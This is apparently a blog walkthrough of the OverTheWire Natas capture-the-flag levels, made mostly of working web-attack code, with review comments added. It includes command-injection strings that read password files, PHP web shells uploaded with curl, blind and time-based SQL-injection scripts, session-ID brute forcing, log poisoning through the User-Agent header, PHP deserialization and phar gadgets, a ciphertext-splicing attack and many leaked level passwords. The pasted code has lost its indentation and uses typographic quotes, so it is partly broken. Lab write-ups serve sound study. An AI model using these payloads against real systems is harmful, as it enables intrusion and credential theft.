
Overthewire--natas

DaisyDragonD 2023-07-08 04:00:03
简介Overthewire--natas

3 Not even Google will find it this time
http://natas3.natas.labs.overthewire.org/robots.txt

4 tKOcJIbzM4lTs8hbCmzn5Zr4434fGZQm

change Referer:

9 command injection
;cat /etc/natas_webpass/natas10
; separates the injected command from the preceding grep -i command

  1. command injection
    . /etc/natas_webpass/natas11

<?php function xor_encrypt($in) { $key = json_encode(array("showpassword"=>"no", "bgcolor"=>"#ffffff")); $text = $in; $outText = ''; // Iterate through each character for($i=0;$i

nano natas11.php

<? passthru("cat /etc/natas_webpass/natas13");?>

curl -u natas12:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG http://natas12.natas.labs.overthewire.org/ -F “uploadedfile=@natas11.php” -F “filename=natas11.php”

burpsuite:
change jpg to php

nano natas11.php
GIF87a

<? passthru("cat /etc/natas_webpass/natas13");?>

curl -u natas13:YWqo0pjpcXzSIl5NMAVxg12QxeC1w9QG http://natas13.natas.labs.overthewire.org/ -F “uploadedfile=@natas11.php” -F “filename=natas11.php”

burpsuite:
change jpg to php

Content-Disposition: form-data; name=“filename”

rc74vy46dy.php

  1. sql injection
    "+or+1=1#

15 sql injection

username=natas16"+AND+LENGTH(password)>n#
username=natas16"+AND+substr(password,1,1)+like+binary+“%A%”#

Use BINARY when the SQL LIKE comparison is not case-sensitive.

n=32

TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V

# natas15 -- blind SQL injection, recovering the password one character at
# a time. The injected username closes the string with `"` and appends
# `AND password LIKE BINARY "<prefix>%"`; a reply containing "This user
# exists" confirms the prefix. BINARY keeps LIKE case-sensitive.
# NOTE(review): indentation was lost in this paste, so the while/for/if
# nesting is not shown. `requests` is imported outside this snippet.
# charset_1 is a reduced candidate set, presumably pre-filtered beforehand
# (the natas16 script further down shows the same two-pass idea).
# Server-side fix: bind the username as a query parameter instead of
# concatenating it into the SQL string.
target = ‘http://natas15.natas.labs.overthewire.org’
charset_1 = “adfgijklqruADEHOPRTVZ23579”

password = “”
# Each pass appends one confirmed character; 32 is the known length (n=32).
while len(password) != 32:
for c in charset_1:
t = password + c
username = (‘natas16" AND password LIKE BINARY "’ + t +‘%" "’)
r = requests.get(target,
auth=(‘natas15’,‘TTkaI7AWG4iDERztBcEyKV7kRXH1EZRB’),
params={“username”: username}
)
# Progress is printed padded with '*' to the full 32 characters.
if “This user exists” in r.text:
print ('PASS: ’ + t.ljust(32, ‘*’))
password = t
break

16… import requests
from requests.auth import HTTPBasicAuth

# natas16 -- command injection through the `needle` parameter. The value
# `doomed$(grep <c> /etc/natas_webpass/natas17)` is presumably expanded by
# the server's shell before the outer grep runs; the script treats the
# absence of "doomed" in the reply as "the inner grep matched".
# NOTE(review): indentation was lost in this paste -- the for/if nesting is
# not shown. `requests` and HTTPBasicAuth are imported above.
# Server-side fix: never interpolate user input into a shell string; pass
# it as a separate argv element without a shell, and reject unexpected
# characters.
auth=HTTPBasicAuth(‘natas16’, ‘TRD7iZrd5gATjj9PkPEuaOlfEjHqj32V’)

filteredchars = ‘’
passwd = ‘’
allchars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890’
# Pass 1: which characters occur anywhere in the password.
for char in allchars:
r = requests.get(‘http://natas16.natas.labs.overthewire.org/?needle=doomed$(grep ’ + char + ’ /etc/natas_webpass/natas17)’, auth=auth)

if ‘doomed’ not in r.text:
filteredchars = filteredchars + char
print(filteredchars)

# Pass 2: extend the known prefix; `^` anchors the match to the line start
# (see the note on grep ^ and $ below). 32 iterations = password length.
for i in range(32):
for char in filteredchars:
r = requests.get(‘http://natas16.natas.labs.overthewire.org/?needle=doomed$(grep ^’ + passwd + char + ’ /etc/natas_webpass/natas17)', auth=auth)

if ‘doomed’ not in r.text:
passwd = passwd + char
print(passwd)
break

grep ^ $
are meta-characters that respectively match the empty string at the beginning and at the end of a line

17.username=natas18"+AND+substring(password,1,1)+like+binary+“%8%”+AND+sleep(5)#

import requests
from requests.auth import HTTPBasicAuth

# natas17 -- time-based blind SQL injection. The (URL-encoded) username is
# `natas18" and password like binary '%<c>%' and sleep(1) #`; the only
# signal is whether the response took at least one second.
# NOTE(review): `r.elapsed.seconds` is an integer field, so 0.99 s counts
# as 0 and a slow non-matching request (network jitter) counts as a hit,
# which silently corrupts `filteredchars` / `passwd`. Comparing
# `r.elapsed.total_seconds()` against a margin above the sleep would be
# more robust. Indentation was lost in this paste -- nesting is not shown.
# `Auth` would conventionally be lower-case. Detection angle: many
# near-identical POSTs to index.php, each taking ~1 s, is the typical
# footprint of this technique.
Auth=HTTPBasicAuth(‘natas17’, ‘XkEuChE0SbnKBvH1RU7ksIb9uuLmI7sd’)
headers = {‘content-type’: ‘application/x-www-form-urlencoded’}
filteredchars = ‘’
passwd = ‘’
allchars = ‘abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ1234567890’

# Pass 1: which characters occur anywhere in the password.
for char in allchars:
payload = ‘username=natas18%22+and+password+like+binary+%27%25{0}%25%27+and+sleep%281%29+%23’.format(char)
r = requests.post(‘http://natas17.natas.labs.overthewire.org/index.php’, auth=Auth, data=payload, headers=headers)
if(r.elapsed.seconds >= 1):
filteredchars = filteredchars + char
print(filteredchars)

print(filteredchars)

# Pass 2: extend the known prefix (`<prefix><c>%`), 32 characters total.
for i in range(0,32):
for char in filteredchars:
# NOTE(review): the quoting of this literal is garbled in the paste (a
# typographic ’ sits inside the string); compare with the pass-1 payload.
payload = ‘username=natas18%22%20and%20password%20like%20binary%20’{0}%25’%20and%20sleep(1)%23’.format(passwd + char)
r = requests.post(‘http://natas17.natas.labs.overthewire.org/index.php’, auth=Auth, data=payload, headers=headers)
if(r.elapsed.seconds >= 1):
passwd = passwd + char
print(passwd)
break

#!/bin/python3
import requests
# natas18 -- try PHPSESSID values 0..640 (maxid = 641) under basic auth
# until the admin banner appears. `str(h.content)` is the repr of a bytes
# object (b'...'), which still lets the plain-ASCII `match` be found.
# NOTE(review): indentation of the loop body was lost in this paste; the
# two indented lines belong to the `if`. `print(i)` is the only progress
# output. Server-side fix: session ids must be unpredictable (PHP's own
# generator, not a small integer) and the admin flag must not be derived
# from an id the client chooses.
maxid = 641
url = “http://natas18.natas.labs.overthewire.org”
user = “natas18”
passwd = “8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s”
match = “You are an admin. The credentials for the next level are:”

for i in range(maxid):
c = dict(PHPSESSID=str(i))
h = requests.get(url, auth=(user, passwd), cookies=c)
print(i)

if match in str(h.content):
    print (h.content)
    break

#!/bin/python3
import requests
import binascii

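def str2byte(s):
    """Encode text *s* as UTF-8 bytes.

    Args:
        s: the text to encode.

    Returns:
        The UTF-8 encoding of ``s`` as ``bytes``.
    """
    # str.encode is the idiomatic spelling of bytes(s, encoding="utf-8");
    # the original used typographic quotes, which are a SyntaxError.
    return s.encode("utf-8")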

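def byte2hex(b):
    """Return the lowercase hex string of *b*, two digits per byte.

    Args:
        b: a ``bytes``-like object or any iterable of ints in 0..255.

    Returns:
        The hex digits with no separator, e.g. ``b"\\x00\\xff"`` -> ``"00ff"``.
    """
    # bytes.hex() yields exactly the zero-padded lowercase digits that the
    # hand-rolled hex(n)[2:].rjust(2, '0') join produced; bytes(b) keeps
    # accepting plain int iterables as the original did.
    return bytes(b).hex()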

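def str2hex(s):
    """Return the hex encoding of the UTF-8 bytes of text *s*.

    Args:
        s: the text to encode.

    Returns:
        Lowercase hex digits, two per byte, no separator.
    """
    # Self-contained so the helper does not depend on the sibling
    # str2byte/byte2hex definitions; the result is identical to
    # byte2hex(str2byte(s)).
    return s.encode("utf-8").hex()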

# natas19 -- same enumeration as natas18, but the candidate session id is
# the hex encoding of "<i>-admin" (str2hex above), 641 candidates (0..640).
# NOTE(review): `passwd` repeats the value used for natas18 further up --
# verify it is really the natas19 credential. Indentation of the loop body
# was lost in this paste. Server-side fix as for natas18: random session
# ids, and no role information encoded in a client-chosen id.
maxid = 641
user = “natas19”
passwd = “8LMJEhKFbMKIL2mxQKjv0aEDdk7zpT0s”
url = “http://”+user+“.natas.labs.overthewire.org”
admin = ‘-admin’
match = “You are an admin. The credentials for the next level are:”

for i in range(maxid):
c = dict(PHPSESSID=str2hex(str(i)+admin))
h = requests.get(url, auth=(user, passwd), cookies=c)
print (i)
# str(h.content) is the bytes repr; the ASCII banner is still findable.
if match in str(h.content):
print (h.content)
break

burp suite:
intruder

20.admin%0Aadmin%201

admin
admin 1
Username: natas21
Password: 89OWrTkGmiLZLv12JY4tLj2c4FW0xn56

add:
admin=1
delete PHPSESSID=
get a new one paste it in the last page’s cookie session

22.GET /?revelio&admin=1 HTTP/1.1

23.111iloveyou

24
if(!strcmp($_REQUEST[“passwd”],“”))
passwd[]

25
GET /?lang=…//…//…//…//…//var/www/natas/natas25/logs/natas25_1111.log HTTP/1.1
Host: natas25.natas.labs.overthewire.org
User-Agent: <? passthru("cat /etc/natas_webpass/natas26");?>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Authorization: Basic bmF0YXMyNTpPOVFEOURaQkRxMVlwc3dpVE01b3FNRGFPdHVadEFjeA==
Connection: close
Referer: http://natas25.natas.labs.overthewire.org/?lang=en
Cookie: __utma=176859643.158281406.1678403383.1682021919.1682028223.37; __utmz=176859643.1681183138.20.4.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=(not%20provided); __utmc=176859643; __utmb=176859643.1.10.1682028223; __utmt=1; PHPSESSID=1111
Upgrade-Insecure-Requests: 1

26

<?php class Logger{ private $logFile; private $initMsg; private $exitMsg; function __construct($file){ // initialise variables $this->initMsg="#--session started--# "; $this->exitMsg="natas27:<? include '/etc/natas_webpass/natas27'; ?>";
        // Review: this is a deserialization gadget for natas26. The class
        // name and private property names mirror the target's Logger so
        // that unserialize() of the cookie value (presumably PHPSESSID,
        // see the line after the output) rebuilds a Logger whose logFile
        // points into the web root (img/...php) and whose exitMsg carries
        // PHP. Presumably the target's __destruct writes exitMsg to
        // logFile -- the method bodies here are empty; confirm against the
        // level source. Server-side fix: never unserialize() cookie data;
        // store session state server-side or use JSON, or at least
        // unserialize($x, ['allowed_classes' => false]).
        $this->logFile = "img/ccr69c3h6thiqn5m68tm2h8hpm.php";
    }

       // No-op: only the serialized property values matter, not the
       // methods of this local copy.
       function log($msg){
               ;     
       }

    function __destruct(){
       ;
    }
 }  

// Serialize, base64 and URL-encode to get the cookie value shown below.
// Private property names are serialized with a \0Logger\0 prefix (the s:15
// lengths in the output agree), which is why URL-encoding is needed.
// NOTE(review): the quotes on the next line are typographic in the paste.
$payload = new Logger(“ccr69c3h6thiqn5m68tm2h8hpm”);

echo urlencode(base64_encode(serialize($payload)));

?>

output:Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czozNDoiaW1nL2NjcjY5YzNoNnRoaXFuNW02OHRtMmg4aHBtLnBocCI7czoxNToiAExvZ2dlcgBpbml0TXNnIjtzOjIyOiIjLS1zZXNzaW9uIHN0YXJ0ZWQtLSMKIjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6NTE6Im5hdGFzMjc6PD8gaW5jbHVkZSAnL2V0Yy9uYXRhc193ZWJwYXNzL25hdGFzMjcnOyA
PHPSESSID==

http://natas26.natas.labs.overthewire.org/img/ccr69c3h6thiqn5m68tm2h8hpm.php

#!/usr/bin/env python

# -*- coding: utf-8 -*-

import requests
import re

# natas27 -- two POSTs per iteration: first a request whose username is
# "natas28" padded with j copies of "x00" plus "xxxx", then a plain login
# as natas28 / "11"; "Welcome" in the reply ends the loop.
# NOTE(review): "x00" here is the literal three characters -- presumably
# "\x00" (a NUL byte) was intended and the backslash was lost in the
# paste. This looks like a column-length truncation trick (the padded
# name collides with the real row once stored) -- confirm against the
# level source. `allchar`, `s` and `import re` are unused leftovers, and
# `str(response.text)` is redundant (text is already str). Indentation of
# the loop body was lost in this paste. Server-side fix: reject usernames
# longer than the column and check uniqueness on the stored value.
allchar = ‘abcdefABCDEF’
s = 10
maxtime = 100
username = ‘natas27’
password = ‘PSO8xysPi00WKIiZZ6s6PtRmFy9cbxj3’
match = “Welcome”
url = ‘http://%s.natas.labs.overthewire.org/’ % username

session = requests.Session()

for j in range(maxtime):

response = session.post(url, data = {"username": "natas28" + "x00"*j +"xxxx", "password": "11" },auth =(username,password))
# Every full page is printed; expect verbose output.
print(response.text)
response = session.post(url, data = {"username": "natas28" , "password": "11" },auth =(username,password))

print(j)
print(response.text)

if match in str(response.text): 
	print(response.text)
	break

G%2bglEae6W/1XjA7vRm21nNyEco/c%2bJ2TdR0Qp8dcjPItlMM3qTizkRB5P2zYxJsbWnPci/qKte0ohRTkObF%2bT5ujPcGtKfnu/mSL/syLoz0xm5xtyst2O9VZ/szQKTUzc4pf%2b0pFACRndRda5Za71vNN8znGntzhH2ZQu87WJwI%3d

import requests
import urllib
import base64
# natas28 -- one Session carries HTTP basic auth for every request below.
# NOTE(review): `import urllib` alone does not import `urllib.parse`; the
# `urllib.parse.unquote` calls further down only work because requests
# happens to import it -- use `import urllib.parse` explicitly.
url = “http://natas28.natas.labs.overthewire.org”
s = requests.Session()
#basic auth
s.auth = (‘natas28’, ‘skrwxciAe6Dnb0VfFDzDEHcCzQmv3Gd4’)

# First we generate a baseline for the header/footer

# natas28 -- ciphertext splicing. The server returns the encrypted query in
# the redirect URL; the script decodes it, keeps the first 48 bytes as
# header and the rest as footer, gets a UNION SELECT payload encrypted the
# same way, and pastes the payload's 16-byte blocks between header and
# footer. This only works if blocks are encrypted independently
# (presumably ECB) -- confirm against the level. Server-side fix:
# authenticated encryption (an AEAD, or a MAC over the ciphertext) so that
# a spliced ciphertext is rejected before decryption.
# Indentation of the `while` body was lost in this paste.
data = {‘query’:10 * ’ ‘}
r = s.post(url, data=data)
# NOTE(review): split('=')[1] assumes exactly one '=' in the redirect URL;
# urllib.parse.parse_qs on the query string would not break on a second one.
baseline = urllib.parse.unquote(r.url.split(’=‘)[1])
baseline = base64.b64decode(baseline.encode(‘utf-8’))
header = baseline[:48]
#Manually analyze response to extract the information we need out of the HTML response
footer = baseline[48:]
# NOTE(review): the apostrophe inside this literal is a typographic ’ in
# the paste; a plain ' was presumably intended.
sqli = 9 * " " + "’ UNION SELECT password FROM users;#"
data = {‘query’:sqli}
r = s.post(url, data=data)
exploit = urllib.parse.unquote(r.url.split(‘=’)[1])
exploit = base64.b64decode(exploit.encode(‘utf-8’))
#Calculating the size of the payload
# nblocks = ceil((len(sqli) - 10) / 16): the payload length beyond the
# 10-character baseline query, rounded up to whole 16-byte blocks.
nblocks = len(sqli) - 10
while nblocks % 16 != 0:
nblocks += 1
nblocks = int(nblocks / 16)
# Splice: baseline header + payload blocks + baseline footer.
final = header + exploit[48:(48 + 16 * nblocks)] + footer
print(exploit[48:(48 + 16 * nblocks)])
# b64encode returns bytes; requests accepts bytes as a query value.
final_ciphertext = base64.b64encode(final)
print(final_ciphertext)
search_url = “http://natas28.natas.labs.overthewire.org/search.php”
resp = s.get(search_url, params={“query”:final_ciphertext})
print(resp.text)

file=|ls%00

|cat +index.pl%00

|cat+/etc/na’tas_webpass/nat’as30%00

30
quote(param(‘username’))

username=natas30&password=‘a’+or+1&password=2

The problem mostly doesn’t lie with quote per se. quote is secure if used properly (although it’s not the best choice in this situation). However, if param is the param from CGI.pm, or from anything else that has similar behavior, you have a big problem.

You see, param is context-sensitive. In scalar context, if the parameter has a single value (name=foo), it returns that value, and if the parameter has multiple values (name=foo&name=bar) it returns an arrayref. In list context, it returns a list of values, whether there are zero, one, or many. The argument list of a method (such as quote) is a list context. That means that someone using your app can cause quote to receive two values, and quote’s optional second argument is an SQL data type that the first argument should be treated as. If the data type is a non-string type like NUMERIC, then quote will pass its first argument through without any quoting. This constitutes an opportunity for SQL injection.

curl -u natas31:AMZF14yknOn9Uc57uKB02jnYuhplYka3 “http://natas31.natas.labs.overthewire.org/index.pl?/etc/natas_webpass/natas32” -F “file=ARGV” -F “file=@natas31.csv”

curl -u natas32:Yp5ffyfmEdjvTOwpN5HCvh7Ctgf9em3G “http://natas32.natas.labs.overthewire.org/index.pl?ls%20-l%20.%20|” -F “file=ARGV” -F “file=@natas31.csv”

natas32

.:
total 156
drwxr-x--- 5 natas32 natas32 4096 Apr 23 18:01 bootstrap-3.3.6-dist
-rwsrwx--- 1 root natas32 16096 Apr 23 18:01 getpassword
-rw-r--r-- 1 root root 9740 Apr 23 18:01 index-source.html
-r-xr-x--- 1 natas32 natas32 2968 Apr 23 18:01 index.pl
-r-xr-x--- 1 natas32 natas32 97180 Apr 23 18:01 jquery-1.12.3.min.js
-r-xr-x--- 1 natas32 natas32 16877 Apr 23 18:01 sorttable.js
drwxr-x--- 2 natas32 natas32 4096 Apr 30 10:39 tmp

curl -u natas32:Yp5ffyfmEdjvTOwpN5HCvh7Ctgf9em3G “http://natas32.natas.labs.overthewire.org/index.pl?./getpassword%20|” -F “file=ARGV” -F “file=@natas31.csv”

-natas33.php

<?php echo shell_exec('cat /etc/natas_webpass/natas34'); ?>

upload and change file name

-natas33-create-phar.php

<?php class Executor { private $filename = "natas33.php"; private $signature = True; private $init = false; } $phar = new Phar("natas33-phar.phar"); $phar->startBuffering(); $phar->addFromString("natas33-phar.txt", 'natas33-phar'); $phar->setStub("<?php __HALT_COMPILER(); ?>");
    // Review: the Executor object becomes the archive's metadata, which
    // PHP stores serialized and unserializes when the metadata is read
    // (older PHP versions do this automatically when the archive is
    // opened through phar://, see the phar:// line below). The private
    // properties (filename = natas33.php, signature = true, init = false)
    // are thus handed to the target's Executor; natas33.php holds the
    // shell_exec shown above.
    // NOTE(review): property meanings are taken from their names only --
    // confirm against the natas33 source. Server-side fix: do not let a
    // user-supplied path with a scheme reach filesystem functions
    // (validate/whitelist local paths), and never trust unserialized
    // metadata from uploaded archives.
    $o = new Executor();
    $phar->setMetadata($o);
    $phar->stopBuffering();

?>

-php natas33-create-phar.php
===> natas33-create-phar.phar

upload and change file name

-phar://natas33-phar.phar/natas33-phar.txt
